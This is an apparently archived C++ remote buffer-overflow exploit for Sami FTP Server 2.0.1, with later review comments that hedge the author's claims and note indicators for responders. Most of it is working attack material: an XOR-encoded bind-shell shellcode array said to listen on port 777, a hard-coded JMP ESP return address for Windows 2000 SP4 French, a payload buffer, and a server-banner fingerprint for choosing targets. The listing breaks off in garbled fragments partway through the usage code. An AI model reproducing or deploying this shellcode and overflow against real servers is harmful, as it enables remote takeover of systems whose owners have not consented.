Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)

28-03-2011 00:08

 // Two includes.

#include 
#include 
// Project - Settings - Link > Object/Library modules \'Ws2_32.lib\'
#pragma comment(lib, \"ws2_32\")
 
// Encoded payload bytes carried by the exploit request.
// According to the author's inline notes, the bytes are XOR-encoded with the
// 0x99 key and the body is a bind shell on port 777.
// NOTE(review): both statements are taken from the original comments; the bytes
// were not disassembled for this review, so treat them as the author's claim.
// For responders: going by that description, an unexpected listener on port 777
// on a host running Sami FTP Server 2.0.1 is the observable to look for.
char MyShellCode[] =       // XOR by \\x99\\x99\\x99\\x99.
\"\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x31\\xC9\\xB1\\x59\\x81\\x73\\x17\\x99\\x99\"
\"\\x99\\x99\\x83\\xEB\\xFC\\xE2\" // Bind ShellCode port 777.
                        \"\\xF4\\x71\\xA1\\x99\\x99\\x99\\xDA\\xD4\\xDD\\x99\"
\"\\x7E\\xE0\\x5F\\xE0\\x7C\\xD0\\x1F\\xD0\\x3D\\x34\\xB7\\x70\\x3D\\x83\\xE9\\x5E\"
\"\\x40\\x90\\x6C\\x34\\x52\\x74\\x65\\xA2\\x17\\xD7\\x97\\x75\\xE7\\x41\\x7B\\xEA\"
\"\\x34\\x40\\x9C\\x57\\xEB\\x67\\x2A\\x8F\\xCE\\xCA\\xAB\\xC6\\xAA\\xAB\\xB7\\xDD\"
\"\\xD5\\xD5\\x99\\x98\\xC2\\xCD\\x10\\x7C\\x10\\xC4\\x99\\xF3\\xA9\\xC0\\xFD\\x12\"
\"\\x98\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xC1\\x91\\x72\\x95\\x14\\xCE\\xB5\"
\"\\xC8\\xCB\\x66\\x49\\x10\\x5A\\xC0\\x72\\x89\\xF3\\x91\\xC7\\x98\\x77\\xF3\\x93\"
\"\\xC0\\x12\\xE4\\x99\\x19\\x60\\x9F\\xED\\x7D\\xC8\\xCA\\x66\\xAD\\x16\\x71\\x09\"
\"\\x99\\x99\\x99\\xC0\\x10\\x9D\\x17\\x7B\\x72\\xA8\\x66\\xFF\\x18\\x75\\x09\\x98\"
\"\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCC\\xB9\\xCE\\xCE\\xCE\\xCE\\xDE\\xCE\\xDE\"
\"\\xCE\\x66\\xCC\\x85\\x10\\x5A\\xA8\\x66\\xCE\\xCE\\xF1\\x9B\\x99\\x9A\\x90\\x10\"
\"\\x7F\\xF3\\x89\\xCF\\xCA\\x66\\xCC\\x81\\xCE\\xCA\\x66\\xCC\\x8D\\xCE\\xCF\\xCA\"
\"\\x66\\xCC\\x89\\x10\\x5B\\xFF\\x18\\x75\\xCD\\x99\\x14\\xA5\\xBD\\xA8\\x59\\xF3\"
\"\\x8C\\xC0\\x6A\\x32\\x10\\x4E\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA4\\x10\"
\"\\xE5\\xBD\\xD1\\x10\\xE5\\xBD\\xD5\\x10\\xE5\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\xCD\"
\"\\xC9\\xC8\\xC8\\xC8\\xD8\\xC8\\xD0\\xC8\\xC8\\x66\\xEC\\x99\\xC8\\x66\\xCC\\xA9\"
\"\\x10\\x78\\xF1\\x66\\x66\\x66\\x66\\x66\\xA8\\x66\\xCC\\xB5\\xCE\\x66\\xCC\\x95\"
\"\\x66\\xCC\\xB1\\xCA\\xCC\\xCF\\xCE\\x12\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\"
\"\\x9C\\xE1\\x98\\x73\\x12\\xD3\\x81\\x12\\xC3\\xB9\\x98\\x72\\x7A\\xAB\\xD0\\x12\"
\"\\xAD\\x12\\x98\\x77\\xA8\\x66\\x65\\xA8\\x59\\x35\\xA1\\x79\\xED\\x9E\\x58\\x56\"
\"\\x94\\x98\\x5E\\x72\\x6B\\xA2\\xE5\\xBD\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x98\\x72\"
\"\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x98\\x72\\x12\\x9D\\x12\\x98\\x71\\x72\\x9B\"
\"\\xA8\\x59\\x10\\x73\\xC6\\xC7\\xC4\\xC2\\x5B\\x91\\x99\";
 
// File-scope state for the tool. The code that reads and writes these objects
// is not part of the visible listing, so the roles below are hedged where they
// rest on names alone.

// Fixed 1329-byte buffer with static storage (zero-filled at program start).
// Presumably the outgoing request is assembled here; verify against the code
// that fills it.
static char PayLoad[1329]; 
 
// presumably the target address and port taken from the command line; TODO confirm
int IP;                    
int Port;                  
// presumably sizes of two padding runs placed around the payload; TODO confirm
int szNOP1, szNOP2;        
// NOTE(review): use not visible in this listing
int Nop;
 
// Four-byte return-address overwrite. The author states it is the address of a
// JMP ESP instruction inside User32 on Windows 2000 SP4 (French build).
// A hard-coded module address only holds for that exact OS build and language;
// on any other build, or where module bases are randomised (ASLR), the value is
// wrong and the likely outcome is a crash of the FTP service rather than code
// execution, which is still a visible event for monitoring.
char JmpESP[] = \"\\x0C\\xED\\xE3\\x77\";
// Banner text the author uses to recognise a Sami FTP server.
// presumably compared against RecvBuff after connecting; TODO confirm
char TargetFlag[] = \"220-\\r\\n220 Features p a .\";
// Fixed 200-byte buffer, presumably for the server's reply. NOTE(review): the
// receive call is not visible; any read into this buffer has to be limited to
// sizeof RecvBuff - 1 and NUL-terminated before string comparison.
char RecvBuff[200];
 
void usage(){
  cout<<\" \"< 3 ) ){usage();return -1;}
 
if( argc > 1 ){
  cout<<\"argv[1]\"<<\"\\t\"<
